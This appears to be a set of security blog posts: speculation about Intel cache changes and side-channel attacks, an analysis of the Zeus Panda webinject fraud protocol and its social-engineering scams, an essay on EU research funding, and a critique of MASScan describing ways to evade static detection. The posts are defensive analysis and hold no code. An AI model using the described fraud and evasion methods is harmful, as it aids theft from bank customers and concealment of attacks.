New cache architecture on Intel I9 and Skylake server: An initial assessment

 

Intel has introduced the new I9 CPU which is seen as HEDT (High-End-DeskTop) product. The micro architecture is in many respects shared with the new Skylake server micro architecture.I f history is a guide technology introduced in this segment slowly trickles down to more budget friend desktops. From a Micro architecture point of view it seems that several things about these CPU’s will force changes on micro architectural attacks – especially in the memory subsystem. In this blog post I’ll do a short overview on some of relevant changes and the effects they’ll may have on micro architecture attacks. Since I don’t own or have access to an actual I9 processor or Skylake server processor this blog post is just conjecture.

 

Resume of the “old” cache hierachy

The major changes over earlier process from a micro architecture point of view is that the cache system has received a significant overhaul. Current Intel CPUs have a 3 level cache hierarchy – two very small L1 caches, one for data, one for instructions. The second level cache (L2 or Mid Latency Cache) is somewhat larger. L1 data, L1 code and L2  part of each core and private to the core. Finally, Intel CPU’s had a huge 3rd level cache (usually called L3 or  largest latency cache) shared between all cores. The 3rd level cache is subdivided into slices that are logically connected to a core. To effectively share this cache, Intel connected them on a ring bus called the Quick Path Interconnect. Further the 3rd level cache was an inclusive cache, which means that anything that is anything cached in L1 or L2 must also be cached in L3.

 

Changes

Some of the important changes that has been announced in the Intel Software Optimization Manuals [1]  are:

–    A focus on a high number of cores in the CPU (up to 18 in the HEDT models)

–    A reduced over all cache size per core (compared to similar older models)

–    A very significant increase in the size of the L2 (factor of 4)

–    Doubled the bandwidth of L2, while only slightly increasing the latency

–    Slightly more than offset by a reduction of the shared L3.

–    Reorganized  L3 cache to be a non-inclusive cache

–    Replaces the QPI with a mesh-style bus.

Why does these changes make sense?

Increasing the size of L2 on the cost of L3 makes sense as the L2 is much faster than L3 for applications – one can only assume that making the L3 helps reduce die size and cost. Also the increase in size of the L2 caches reduces the marginal utility of the L3. Finally  as the probability of cache set contention rises with the number of cores, it becomes advantageous to make a larger part of the total cache private. Cache contention in L3 is a problem Intel has battled before. With Haswell they introduced Cache Allocation Technology (CAT) to allow software to control cache usage of the L3 to deal with contention.

The number of cores is probably also the reason why Intel dropped the QPI ring buffer design. There is a penalty for having memory served from another core’s slices. On a ring bus this penalty is proportional to how far the cores are a part on the ring. With more cores, this penalty increases. Moving to a more flexible system seems sensible from this vantage point.

Having an inclusive L3 makes cache coherency easier and faster to manage. However, an inclusive cache comes with a cost as the same data are loaded in multiple caches. The relative loss of total cache storage space is exactly the ratio of the (L2 +L1) to L3 sizes. Previous this ratio has been around 1:10 (depending on actual CPU), but multiplying the L2 size by 4 and making the L3 a tiny bit smaller the ratio is now about 1:1.5. Thus the making the L3 cache non-inclusive is very essential to performance. At this point it’s important to notice that Intel uses the wording “non-inclusive”. This term is not well defined. The opposite of inclusive is exclusive meaning the content of L3 cannot be loaded in L1 and L2. I think Intel would have used the defined term exclusive if the cache really where exclusive. Thus,   it is probably fair to assume that non-inclusive means that data may or may not be cached in L1, L2 and L3 at the same time, but exactly how this is governed is important. Unfortunately there is no information available on this.

It’s worth noting that many of these changes has been tested and developed by Intel for the Knights landing micro architecture. Knights landing is a high throughput micro architecture, sold in relative small amounts. Thus it’s likely that many features developed for this CPU will end up being trickled down.  It’ll be interesting to see if Intel plans to trickle it down into laptop/small desktops or use different cache designs for different classes of CPUs.

 

Effects

Cache side channel attacks

This new cache layout is likely to have profound effect on cache side channel attacks. I think Flush+Reload will work even without the non-inclusive cache. The flush primitive is based on the CLFlush instruction which is part of the instruction set architecture (ISA). Intel has been very reluctant in the past to change the ISA and therefore my estimate is that flushing will work as always. I think the reload primitive will remain active – I find it likely that an uncached load will also load stuff into the shared L3. Also it’s likely that the QPI replacement bus can be used to fetch data from private L2 caches similar to AMD’s cross CPU transmission. This will give Flush+reload a nice flush+transfer flavor, but it’ll still work. For more on Invalidate (Flush)+Transfer see [2]. Since the L3 cache must be filled in someway we can fairly certain that at least one of these things are true, if not both. The latter being my guess.

The big change are likely to be related to evict and prime primitives. Assuming that cache contention between cores was a major reason for redesigning the cache, it’s unlikely that one can can load stuff into another core’s private hierarchy. Thus, the prime and evict primitives for  cross core attacks.  However,both are likely to work decently within a core (Hyper threading or scheduling on same core).

While the ISA behavior of CLFLush is almost certain to remain unchanged, the micro architecture below it will see significant changes. With QPI gone using the flush+flush attack by Gruss et al. [3] to find out how many hubs on the ring bus away you are from a particular slice almost certainly won’t work. This does not mean that you won’t find a side channel here in CLFlush, buses are typically bandwidth limited thus being an obvious source of congestion – without an inclusive L3 the bus bandwidth might even be easier to consume. Also the Flush+Flush attack as a Flush+reload replacement, is likely to produce a different timing behavior in the new micro architecture. My guess upfront is that a timing difference and thus a side channel remains.

Also affected by the non-inclusiveness of the L3 is row buffer side channel attacks such as those presented by Pessl. et al.[4]  Without an effective eviction cross core attacks may be severely stifled. The ability to reverse engineer the DRAM complex mapping function is likely to remain unchanged as it hinges not on eviction, but the CLFlush instruction’s ISA behavior.

With the CLFlush instruction and evict likely still working on local cores, row hammer will  remain effective. But in some scenarios, indirect effects of  micro architecture changes may break specific attacks such as that of  Sarani Bhattacharya, Debdeep Mukhopadhyay [5]. The reason is that such attacks rely on information leakage in the caches, that becomes more difficult to leverage as described above.

 

Future

While the changes to the cache makes sense with the significant number of cores in the affected systems, it seems unlikely that the changes will trickle down to notebooks and laptops. With only two cores the existing cache design seems sensible. Thus we are likely to see a two tier cache design moving on.

Conclusion

Having a non-inclusive L3 cache is significantly more secure from a side channel perspective than an inclusive in cross core scenarios. This opens up for defending these attacks, by isolating different security domains on different cores potentially dynamically. While flush+reload is likely to be unaffected, this attack is also the easiest to thwart in real life scenarios as avoiding shared memory cross security domains is an available and effective countermeasure. Lots of new research is required to gauge the security of these micro architecture changes.

 

Literature

[1] Intel. Intel® 64 and IA-32 Architectures Optimization Reference Manual. July 2017. https://software.intel.com/sites/default/files/managed/9e/bc/64-ia-32-architectures-optimization-manual.pdf

[2] Irazoqui, Gorka, Thomas Eisenbarth, and Berk Sunar. “Cross processor cache attacks.” Proceedings of the 11th ACM on Asia Conference on Computer and Communications Security. ACM, 2016.a

[3] Gruss, Daniel, et al. “Flush+ Flush: a fast and stealthy cache attack.” Detection of Intrusions and Malware, and Vulnerability Assessment. Springer International Publishing, 2016. 279-299.

[4] Pessl, Peter, et al. “DRAMA: Exploiting DRAM Addressing for Cross-CPU Attacks.” USENIX Security Symposium. 2016.

[5] Sarani Bhattacharya, Debdeep Mukhopadhyay: “Curious case of Rowhammer: Flipping Secret Exponent Bits using Timing Analysis”. http://eprint.iacr.org/2016/618.pdf

Zeus Panda Webinjects: Don’t trust your eyes

In our last blog article Zeus Panda Webinjects: a case study, we described the functionality of current Zeus Panda webinject stages and gave some insight into the corresponding administration panel. As we only scratched the surface of the target specific second webinject attack stage (in the following we reference this as 2nd attack stage), we would like to share more details about this part.

Basically, the 2nd attack stage already includes the complete code needed for the attack. The different code branches are triggered by setting status variables, especially the branch variable already introduced in our previous article on that topic. Last time we also introduced the send() function, which is used to exfiltrate data. send() isn’t entirely unidirectional: the HTTP response of this request includes further code that is evaluated as JavaScript. Thereby the backend is able to set the different status variables to trigger the existing code branches of the 2nd attack stage. Let’s dive into the details of this communication protocol:

Communication protocol and status variables

sequence_zeus_panda
Figure 1: Communication protocol

Figure 1 illustrates the communication protocol between the 2nd attack stage and the backend server. We see the different steps of the communication, the branches triggered, and the website on which the step occurs. Before going into details, the concept behind the communication is the following:

  1. The current attack state is sent from the client to the backend server.
  2. The backend checks for the current attack state and sets the right response parameters to initiate the next attack stage.
  3. The backend response contains variables to notify the 2nd attack stage (client), which attack branch should be executed next.
  4. The 2nd attack stage evaluates the response variables and triggers the next branch.
  5. This procedure is repeated until the final state of the protocol is reached.

Time to branch

Let’s take a detailed look into the different branches now.

Step
Action
1 The SL branch is triggered at the beginning of the attack, when an infected victim accesses the login page of the targeted online banking, inserts the login credentials and clicks on the submit button. (NOTE: The low level Trojan functions need to trigger an the initial webinject (generic loader) on that website and therefore the URL of the online banking website has to be listed in the trojan config file). The submitted login credentials are intercepted, exfiltrated to the backend (see previous blog post), then the 2nd stage code calls the original login function of the banking or payment website. The backend now registers the new victim, identified by the botid. It returns an empty response to the webinject.
2 At this point, the victim has successfully logged in and has been redirected to the account balance overview page. This triggers the 2nd branch: CP. The CP branch is called multiple times during the attack and transmits general status information of the victim to the attacker. The response of the backend contains status flags to trigger the next step of the attack. At this point here, the backend signals to initiate the attack.
3 The attack signal triggers the 3rd step shown in Figure 1: The TL branch. This branch is used to collect details from all available accounts by using the grabber module. Furthermore, a flag is set to indicate a page reload after the response of the send function has been received. The collected data is then exfiltrated again. The botid is used to correlate transmitted data to existing victim entries in the backend and therefore works as unique identifier for the victim. The server response is empty, but the previously set reload flag now triggers the CP branch again.
4 The CP branch now sends the some information to the backend as  described in Step 2. As the backend has stored a different state for the botid already, the response is different now. It signals the 2nd attack stage that the grabber module has finished and the ats module should start now. This module is used to manipulate account details like the account balance or transaction details. Also some status flags are set to trigger the next branch.
5 The GD branch: This branch is used to collect and exfiltrate account details of the victim. As already described in step 3, the reload flag is used to trigger the CP branch again.
6 The CP branch again submits status information, and the backend now triggers the next step of the attack. Besides some status flags, details about the target account and some fake data is provided. The data is used by the CP branch to display a fake overlay with a message and/or images, to trick the victim into starting a transaction. To that end, the fake overlay is used like in a normal phishing attack. We could observe different kinds of messages, which could be categorized into different modi operandi. (see below).

If the victim fell for the scam, the previously provided data is used to pre-fill the transaction form. Naturally, this data contains a target account for the transaction. This account will be controlled by the attacker somehow, i.e., it most likely belongs to a money-mule.

Additionally, the response from the backend contains fake information to be displayed. Depending on the modus operandi, this information is used to display different transaction details to the victim, then the ones used for the transaction in background.

7 Now the victim is redirected to the overview page for a successful transaction. In combination with the current flag state, this page visit triggers the TL branch of the 2nd stage code. The TL branch is used to collect details from the transaction overview page and exfiltrates them to the backend. This indicates a successful transaction to the attacker. The backend response is empty. The webinject transits into the next state, without the need for further communication with the backend.
8 The last triggered branch is called CG. It creates a copy of the complete DOM of the successful transaction overview page and exfiltrates it to the backend. There is no indication that this data is displayed in the admin panel, thus we assume it is transmitted for debug purposes only.

Modi Operandi

In the following we detail two different exemplary modi operandi, which we could observe during our analysis. The real visible appearance is different, as the webinject makes heavy use of the style-sheets provided by the target website. This is a very straight-forward way to properly brand fraudulent content to match the corporate design of target banks or payment providers. We focus on the content shipped to banking customers.

Charity Fraud: SOS-Kinder

SOS_Kinder.png

The victim is asked to donate 1€ to an non-profit organization, in this case for SOS children. This mimics the well know internationally active “SOS-Kinderdorf” organization. The German text is well written and does not contain the obvious indications for phishing that we all love and know from the occasional phishing mail, like contorted grammar and a more than flowery vocabulary. No Google Translate in sight, here. To leverage this scam vector, the webinject makes use of the data provided by the backed in Step 6 as detailed above. Using an overlay, the victim is made believe he/she is transferring 1€, but under the hood the amount is change to a much higher value.

The attackers follow a very classic social engineering approach for our part of the world and appeal to the victims helpfulness: Who doesn’t want to help children in need by spending 1€? We refer to this kind of attack as charity fraud.

Refund Fraud: Finanzpolizei

finanzpolizei_edited

The overlay presents a message to the victim, indicating a transaction has been made to their account. As the victim sees a manipulated version of his account balance, he really believes the transaction has had happen. Furthermore the text indicates a preliminary investigation by the “Finanzpolizei” against the initiator of the transaction. If the victim is not transferring the money back, the text threatens with prosecution by law enforcement for participating in a money laundering scheme.

Finally, all the Google Translate and contextual cluelessness we came to love in the scams out there! Regrettably for the attacker, not all German-speaking countries are actually Germany. (We tried that once, partially, and it was a horrible idea.) An institution called “Finanzpolizei” does indeed exist — but not in Germany. The valid target audience for this scam is thus supposedly to be found in Austria, however, the scam is also actively used in Germany. The German text includes some mistakes and is not as well written as the first modus operandi we have shown above.

In the case at hand, the attackers try to make the victim follow through with a classic refund scam, by threatening legal consequences. As the story works without the need to manipulate the transferred amount under the hood, the fake data needed in the first described modus operandi is not used in this kind of attack. Nevertheless the attack is kind enough to prefill the transaction form with the correct details to ease the transaction for the victim.

Return of the victim

Now let’s assume the victim has been tricked into initiating a transaction by themselves to send their money to the attacker. What happens, if the victim takes a look into his online banking account some time later? As expected, the 2nd attack stage is also prepared for that case: The user is presented the “temporarily unavailable” notification (see Figures 1 and 2 from our previous post) and the login function of the target website is disabled. As long as the status variables are set to the finale state of the described communication protocol, the victim is thus unable to access their account again as long as the backend server is reachable. Even when disabling this blocking functionality, account information like transaction details and total balance are still manipulated. As this manipulations use the originally provided style cheets (CSS) from the target institute, a victim has no way to visibility distinguish between a fake entry and an original one.

Conclusion

Nowadays almost all financial institutes make use of two-factor authentication to protect their users from fraud. The modi operandi used by current banking trojan attacks successfully circumvent this by using social engineering techniques. The victim is tricked into initiating the transaction willingly and happily provides all information needed to confirm the transaction. This is achieved by visible modifications of the website that are indistinguishable from the original website content. The success rate of these attacks is still quite high.

By using a multi-layered attack, it’s also cumbersome for analysts to get an complete insight into the technical details. As soon as the backend server is not available anymore, only the 1st stage of a webinject is accessible on an infected machine. Without the backend server, most of the attack code is not available and therefore some pieces of the puzzle are missing.

These kind of multi-layered attacks have become more and more complex and sophisticated. However, beyond the visual appearance, the code of the original website is modified heavily to make this attacks work and these modifications necessarily leave a footprint. In our fraud detection solutions, we provide our customers with instant visibility into these modification symptoms so they can fare better at protecting their customers’ assets.

Authors: Manuel Körber-Bilgard and Karsten Tellmann

Security for Sale? – On Security Research Funding in Europe

On Wednesday, Feb. 22. 2017, a collective of 20 journalists from eleven countries published their recherches on the European security industry. The article, Security for Sale, published at The Correspondent, mostly seems to revolve around the question of how the funding several players in the field received from Horizon 2020 (H2020) and FP7 framework programmes are put to use for the European people. H2020 is the European Commission’s current funding initiative for research and innovation. Here is the commission’s own explanation.

Simplified, the authors of Security for Sale conclude that the benefit of funding security research for the Europe as a whole is limited, but that the funding works pretty well as hidden subsidies for the industry itself. Their wording is more lenient than mine, but nevertheless I feel that the picture the authors draw is incomplete and I’d like to add another perspective. I can only assume that the data for this article stems from the Secure Societies line of funding, as its core topics are emphasized in the article and some of the articles it links to refer to that – the article does regrettably not contain any straightforward references to its sources. And in my opinion, the Secure Societies line of funding does indeed sometimes yields research results that are scary to everyone who did not answer the question of ‘how do we want to live?’ with ‘I liked the setting depicted in Minority Report quite a bit, but it’s missing the effectiveness of Judge Dredd’.

The authors describe the landscape in the security sector roughly as 1) the big players, where kinetic and digital technology converge, 2) research organizations, 3) universities, and 4) small and medium enterprises (SMEs). Our sector, of Ze Great Cybers, primarily hides in 4) and to some extent increasingly in 1). The article does not explicitly touch the field of information security and neither do many calls in the Secure Societies context, however, most of the projects need to touch the digital domain at some point or other, making it clear that a division of information security and all the other potential flavors of security is merely artificial, given our current state of technology. As the authors observe, this is also reflected by the upcoming funding opportunities:

“similar programs are being set up for cybersecurity and military research”

The EU and some of it’s member states are late to the game and I’m aware that not everybody hacking at computers likes the notion that InfoSec and defense converge. I also dislike the idea and I somehow liked the Internet better when it was still a lot emptier, or as Halvar Flake once put it:

However, I came to enjoy civilization and as most people, I rely on the critical infrastructures that make our societies tick. I’ve been leading incident response assignments in hospitals more than once in the last year and as a human, who may suddenly require the services of a hospital at some point or another, I am very grateful for the effort and dedication my colleagues and the clients’ staff put into resolving the respective incidents. If this means I’m working in defense now, then I still dislike the notion, but I see that the work is necessary and also that we need to think more on the European scale when we want to protect the integrity of our societies. Packets only stop at borders of oppressive societies and that shouldn’t be us.

Now let’s have a look at where the EU’s security research funds go to, according to the article. The authors state

“Companies received by far the most money. That’s not particularly surprising; these same companies were the ones influencing funding policy.”

and illustrate it with the following figure:

funding_distribution_thecorrespondent
Figure 1: Security research funding distribution. Illustration by The Correspondent.

In 2015, I was directly responsible for four H2020 grant applications and consulted on several other applications for nationally or regionally managed funding opportunities. Security in its various flavors is a tiny part of the picture. I’m happy to state that we had an above the average success rate. The illustration in the article struck me as familiar: to me, Figure 1 simply shows a typical distribution of funding within the majority of grant applications I’ve worked on. So it is hardly surprising that the global distribution of funding within technology sector of the programme looks very similar. There is nothing much sinister to that.

Larger corporations do have more opportunities to influence policy, as they can afford the time/resources to lobby. But the main reason for the distribution is salaries on the one hand and grant policy on the other. An engineer working at a large corporation will be more expensive by factor 1.2 to 2.3 than a PhD student, depending on country and the respective corporation. A factor of ~1.9, as in the figure, does not look unreasonable, given that the figure accounts for accumulated costs, not just personnel and that it is more likely that a corporation or a research institute will take the effort of building a demonstrator or pilot installations of a technology, as universities regrettably tend to lack monetization strategies for research results.

Government entities, as the next in line, tend to have very limited personnel resources for research projects and do not have a lot of wiggle room when in comes to contributions.  With a funding scope that aims at technological advances, funding for advisories is often politically limited, and rightly so. As the figures are very much aggregated, I can only assume that the complete sum also contains Coordination and Support Actions (CSAs), which are rather limited funding schemes, financially speaking, that aim at connecting related projects and generally at the systematization of knowledge to avoid arriving at one insight at twice of thrice the funding. This work is sometimes done by entities that could classify as advisories. ‘Other’ can be translated to network and dissemination partners, or dedicated project management (which makes a lot of sense, H2020 projects can be large in terms of the number of partners).

Now let’s not talk militarizing corporations enriching themselves, as the article’s authors suggest, let’s talk research funding effectiveness. I my conversations with the granting side of research funding, it is a constant pain that there is a significant amount of research projects being funded that do not amount to a product. I have seen quite a few projects where I would judge without hesitation that the project was a WoMBaT (i.e., Waste of Money, Brains, and Time) and did primarily serve to compensate for the lack of public funding towards universities.

But that is only a small part of the picture. Another part is that there is a very expensive zone between ‘things you can publish’ and ‘things you can actually use’. Simplifying, technological progress has a tendency to increase complexity. To specify their expectations regarding the results of a funding measure, the European Commission adopted NASA’s Technology Readiness Levels (TRL). In the rather broad field of engineering, we often see the requirement for a validation under lab conditions (TRL 4), to the extent of a working prototype under field conditions (TRL 7), depending on the class of funding action. The funding of a given project often ends at that point.

Using my terminology from above, in the best case you then have something you can publish and/or show off, i.e., an interesting approach that has been shown to be feasible. Between that and monetization are the roughly two to seven years you’ll often need in engineering to go from a prototype to a product. And strictly speaking, research funding ends here, because research ends here. There are almost no publicly funded actions that will allow you to go towards product development, although piloting of a technology in the field can be funded (TRL 9). Nevertheless, either a company is now able to fund the continued development towards a product, or not. This is still a limited view, as I don’t need a new product to monetize research results. It is just as desirable to to improve an existing set of products and services, based on new research results. It is, however, by far not as visible.

Now why more so much funding for the big players? Research grants tends to have a bias towards those applicants, who were able to successfully complete a project, presented impressively in the past and are generally held in good standing. Sounds familiar? Yep,sounds like selecting talks for Black Hat or any other non-academic security conference, where the process is single-blind and the committee needs to judge based only on an abstract, not a full paper with a proper evaluation section and extensive related work. If the data is relatively poor, judgment needs to rely on the applicants reputation and previous work to some extend. And in comparison to a well-backed research paper, grant applications are in their nature always speculative, although very much more detailed than the abstract of a conference submission. If one knew how something was done in the first place, there’d be no need to call it research and there’d be no reason for a grant. The important point is not to fail, if one wants to continue receiving grants (cf. bias, above).

And that still does not fully account for the observation that big players are doing very well in grant applications. A H2020 application is a lot of work, it’s often a hundred pages just for sections 1 to 3, which can easily amount to 100 person days for the coordinator until everything is properly polished. The acceptance rate for Research and Innovation Actions can be as low as 6%. Academic Tier-1 conferences are relaxed in comparison. A small company may simply be unable to compete, economically, i.e., it cannot accept the realistic risk of putting a lot of effort into naught. It’s not as hard in other types of actions, but the risk is still significant and acceptance rates have been getting worse, not better.

“Our investigation reveals that EU security policy emphasizes technology: a high-tech solution is being sought for a societal problem.”

From an outside position I feel that I’m unable to judge the intention and the mindset of the various individuals responsible for the actual wording of the H2020 calls. The persons from this context I’ve met in the past did, however, not leave an impression of exceptional naivety. I genuinely believe that it is in the best interest of European countries and the EU to fund security research, without denying that there may be recipients of funds with a questionable ethical standard. As Europeans, we need to address these issues. I do not want to live in a militarized society and I don’t believe in solving societal problems purely through technology. However, I see a significant amount of opportunities, where usable, efficient technology can enable solutions for societal problems. Given my socialization, I may have a bias towards the security spectrum of research, but that said, I see quite a few things that can and should be done to positively impact the security of our societies. In a changing political climate, Europe needs to step up its security game, also and especially in the digital domain.

And now excuse me, I need to continue that research grant proposal. I’m not doing that for kicks and neither in pure self-interest.

MASScan & the Problems of Static Detection of Microarchitectural attacks

 

Introduction

Microarchitectural attacks have been known for more than a decade now.  The designs behind those architectures are typically optimized for performance, cost and backward compatibility. Therefore it seems unlikely that we will see fixes in CPU architectures which address the root cause for vulnerabilities any time soon. With this in mind, the search for software-based solutions to this problem becomes a priority.

As a contribution to this effort Irazoqui  et al. [1] puplished an interesting paper on static methods to detect microachtitetural attacks which is titled “MASScan: Stopping Microarchitectural Attacks Before Execution”.
The idea is as good as it is naïve. In this blog post I will discuss the reasons behind this position. It should also be noted that the paper in question is an early version and subject to changes.

 

MASScan

The analysis works by flagging code that is rare in real-life applications and often used in an attack context. In this case, ‘attack context’ is defined as code which is either required for an attack to work, or because it improves an attacks’s performance. The list is:

Cache flushing instructions

Clflush, clflushopt
(the authors do not mention this clflushopt, but I have included it for completeness)

Non-temporal instructions

monvnti & movntdq

Timers

Counter threads, performance  counters,  rdtscp, rdtsc  instructions and attempts to set thread affinity to gain core co-location which is important for the accuracy of counter threads.

Fences

lfence, mfence & cpuid

Locking instruction

lock prefix

Algorithmic constructions

Eviction set access code, pointer chasing, jumps in a loop

 

The instructions in question are rarely ever used. With the exception of the lock prefix, all of them are part of the 0x0F escape opcodes. In Zombie’s [5] opcode list (which unfortunately is outdated at the time of writing) 0x0F opcodes represent less than 2% of all opcodes, based on data from 1700 executables. The lock prefix is measured, but is rounded down to 0% in this list. This could serve as an indication that vindicates the author’s notion.

The good part is that solid static analysis is able to effectively spot problems, and highlight them to a human analyst. Further manual analysis can be performed based on those indicators to identify malignant behavior, suspicious cases or to vet out false positives. What makes this approach somewhat challenging is the fact that static analysis is very difficult to do well and impossible to do right, especially when factoring in that attackers try to actively evade static analysis.
The following is to demonstrate what such an evasive action might look like.

 

Microarchitectural & Rice

Rice’s theorem states that all non-trivial semantic properties are undecidable. In short, obfuscation is difficult to deal with. The bad news is that microarchitectural attacks are non-trivial semantic expressions and as such, as per Rice’s theorem, undecidable. In other words: you could achieve the same result in an infinite number of ways, without being able to pinpoint the “right” way. You will never be able to deduce from the semantic output which all syntax representation that cause it.

The example I like to use is this: One could build an interpreter which takes the original program as input. The output of the interpreter would then have the exact same semantics, but a different syntax. Obviously one could then build a new interpreter that processes the first interpreter’s syntax output and so on and so forth. Consequently, we cannot generate a database of syntax representation for a given semantic. The clever reader will already know that microarchitectural attacks do not lend themselves well to emulation or obfuscation for that matter. They often rely on rare syntax elements (rare instructions). Execution time is a very real concern and any obfuscation might change microarchitectural states that are important to the attack. However, this doesn’t mean it’s impossible.

Let’s go through the above list from an attacker’s point of view.

Cache flushing instructions

The clflush instructions can replaced by eviction code as demonstrated by Oren et al. [2] as well as  Gruss et al [3]. This relocates the problem from detecting dangerous instructions to detecting dangerous algorithms. It effectively disqualifies the syntactic element clflush for use as an answer to a semantic question.

Non-temporal instructions & timers

Timers are indeed the Achilles heel of most microarchitectural attacks. The rdtsc(p) instructions are a telltale sign for such an attack. Unfortunately, though, they are used by benign applications as well. Often these instructions are wrapped in API functions, e.g. the QueryPerformanceCounters API on Microsoft Windows. The problem with such API calls is that they can be imported dynamically in any number of ways. This makes a static analysis fairly cumbersome.

Counter Threads

As for counter threads, they too can be implemented in numerous ways. Counting does not have to be monotonic increasing, only deterministically changing. As the CPU’s are superscalar, some instructions can be added to the loop at a very low accuracy penalty. And of course, the loop can be camouflaged.  This not only obscures the actual nature of a function (e.g. a counter thread), it also takes the detection into potential false positive territory. Finally, some attacks (like attacks on KASRL) can be repeated. This allows a low accuracy timer to be used multiple times and then using the law of large numbers to average out the noise.

Fences

Fences are rarely a strict requirement for attacks. They do tend to lower the noise, but an attack could often do without them. For instance, Oren et al. [2] does prime+probe in Javascript without a fence. Flush+Reload works fairly decent without fencing as well. Also, makeshift fences can in some cases be produced by gaming reordering. For instance, filling the reorder buffer with dependent instructions before starting a round of the attack will serve well to fence against already pending loads and stores.

Locking instructions

I’m not aware of any substitution for the lock prefix. In this particular case, we indeed have an indicator that is difficult to replace for an attacker. It should be noted that on Microsoft Windows the Interlocked* API functions use the lock prefix and consequently the same problems arise as with the QueryPerformanceCounter API.

Algorithmic constructions

As far as algorithmic constructions are concerned, those can be varied and obfuscated ad nauseam. Therefore, they make for a poor indicator.
For instance, you could perform eviction using a vector, a tree structure or, in fact, any other data structure. Each of them will generate completely different code. Eviction can be triggered by any instruction that uses memory – therefore, any instruction would achieve this. A very old approach has been memset, which comes at a steep performance penalty for the attacker. However, it would likely suffice for spying on keyboards in Gruss et al. [4] . Call qword ptr [address] can touch two cache lines to load the address and one on the stack, as well as the one or two where the instruction itself lies. That is just an example of how ugly eviction can be made. We could argue with a performance penalty in this case. However, we should bear in mind that optimal eviction strategies not only touch uncached memory, but also memory that is already cached – see Gruss et al. [3]!

It gets worse from there: For row hammer I suggested that we do not need not use eviction. Instead, we could bring the cache coherency policy into play to cause write back into memory, see Fogh [8].  This provides yet another algorithm to detect for protection against row hammer, which of course can be implemented in many different ways.

 

Classic malware obsfuscation – Anti static analysis methods

 

Copy protections and malware has historically used a number of methods to defeat static analysis.

Self-modifying code

I wrote my first executable packer in 1995. Packers go back further than that, though. Once an executable has been packed, the only code that is now available to static analysis in the first stub of the unpacker. Unfortunately, malware authors are aware of this technique and it’s even available for purchase online as part of COTS malware as a service. Also, packers used commercially for copy protection can be used for obfuscation like this.

Malware can of course also decrypt data and save it as an executable on disk or even in memory to avoid static analysis. Techniques such as “Run-PE” are widespread in real world malware.

Another example of self-modifying code is JIT compiling, which is what Javascript does. In fact, I use the keystone assembler JIT style for building microarchitectural attacks fairly often, because it gives me a lot more control than I get from the compiler.

Opening hidden browser windows using malicious java script is entirely possible and Oren et. Al demonstrate that prime+probe runs well in JavaScript. It is worth noting that the browser components can be linked into the malware and subsequently do not need to be present on the victim’s computer.

Such ways of hiding code from analysis is already commonplace and no longer qualifies as sophistication in malware.

Anti-disassembly and code reuse

Static analysis can be performed either based source code or on disassembly. Commercial providers, however, tend not to share their source code for intellectual property reasons. This only leaves disassembly as a method for analysis. Unfortunately, however, the x86 platform has a non-fixed length of opcodes. This results in problems to locate the starting point of an instruction. Historically this has been used as a means to thwart disassembly. A clflush instruction can easily be hidden from disassembly as part of, say, a mov instruction. The extreme version of this is doing code-reuse attacks such as ROP. Obviously a clflush “gadget” does not have to be part of the shipped malware, but could very well be part of the operating system – clflush (In the simplest form) assembles to 3 bytes of which the attacker can influence the third by picking the operand, making it reasonable to find a suitable gadget somewhere in the operating system.

 

A peculiar niche case

We have already seen static analysis thwart these kinds of attacks in one special instance: the NaCl sandbox in Chrome. In there, the code is validated during compiling and run in a sandboxed environment to make sure that none of the above tricks are used. Validation will fail if a clflush instruction is generated. Unfortunately, this is not generally applicable. Never-the-less requiring intermediate language representation (say LLVM) when submitting to a shop may assist the authors intention, but many of the issues mentioned above including Rice’s theorem itself applies to intermediate language representations as well.

 

Conclusion

At this point in time, attackers capable of launching microarchitectural attacks have to be considered ‘advanced’.  We must therefore assume that they have ready access to malware obfuscation technology. This technology can effectively thwart classification using static analysis of executables – this is especially true if the “feature set” is small and malleable. This limited feature set further reduces the cost of applying obfuscation for the attacker. The feature set of MASScan is exactly that: small and mallable. Microarchitectural attacks generally have a bit of leeway for modification to blend in with benign code. Consequently, static analysis is unlikely to give defenders a real edge. Static analysis could be augmented with symbolic or even concolic analysis to improve accuracy. However these methods scale poorly and have issues of their own. Given that it produces a <6% false positive ratio, static analysis seems a dull weapon against microarchitectural attacks. This leaves the dynamic approach which I consider the most promising stop-gap-solution.
For instance, my flush+flush detection blog post [7] or my work with Herath on detecting row hammer and cache attacks at BlackHat 2015 using performance counters [6] are examples of how detecting microarchitectural attacks can be automated in controlled environments. These methods are not without flaws, either. But from an attacker’s point of view they are at least more difficult to work around as they are often behavior-based and consequently circumvent the problem presented by the Rice theorem. Despite progress in defense research, we remain without strong defenses against microarchitectural attacks.

 

Literature

[1] Irazoqui, G., Eisenbarth T., an Sunar B.  MASScan: Stopping Microarchitectural Attacks Before Execution. http://eprint.iacr.org/2016/1196.pdf

[2] Oren, Y., Kemerlis, V. P., Sethumadhavan, S., and Keromytis, A. D. The spy in the sandbox: Practical  cache attacks in javascript and their implications. In Proceedings of the 22Nd ACM SIGSAC Conference on Computer and Communications Security (New York, NY, USA, 2015), CCS ’15, ACM, pp. 1406-1418.

[3] Gruss, D., Maurice, C., and Mangard, S. Rowhammer.js: A remote software-induced fault attack in javascript.  In Proceedings of the 13th International Conference on Detection of Intrusions and Malware, and Vulnerability Assessment -Volume 9721 (New  York,  NY,  USA,  2016),  DIMVA  2016,  Springer-Verlag  New York, Inc., pp. 300{321.

[4] Gruss, D., Spreitzer, R., and Mangard, S. Cache template attacks: Automating  attacks  on  inclusive  last level  caches.   In 24th USENIX Security Symposium (2015), USENIX Association, pp. 897-912

[5] Z0mbie, “Opcode Frequency Statistics”. http://z0mbie.daemonlab.org/opcodes.html

[6] Nishat, H., Fogh, A. “These Are Not Your Grand Daddys CPU Performance Counters”. Black Hat 2015. See also  http://dreamsofastone.blogspot.de/2015/08/speaking-at-black-hat.html

[7] Fogh, A. Detecting stealth mode cache attacks: Flush+Flush. Http://dreamsofastone.blogspot.de/2015/11/detecting-stealth-mode-cache-attacks.html

[8] Fogh, A. Row hammer, java script and MESI- http://dreamsofastone.blogspot.de/2016/02/row-hammer-java-script-and-mesi.html

Zeus Panda Webinjects: a case study

Our mothership G DATA runs extensive automated sample processing infrastructure as part of providing up to date protection to their AV customers. At G DATA Advanced Analytics, we have integrated these processes within our own routines in order to maintain the fraud detection solutions we provide to our customers from the financial sector.

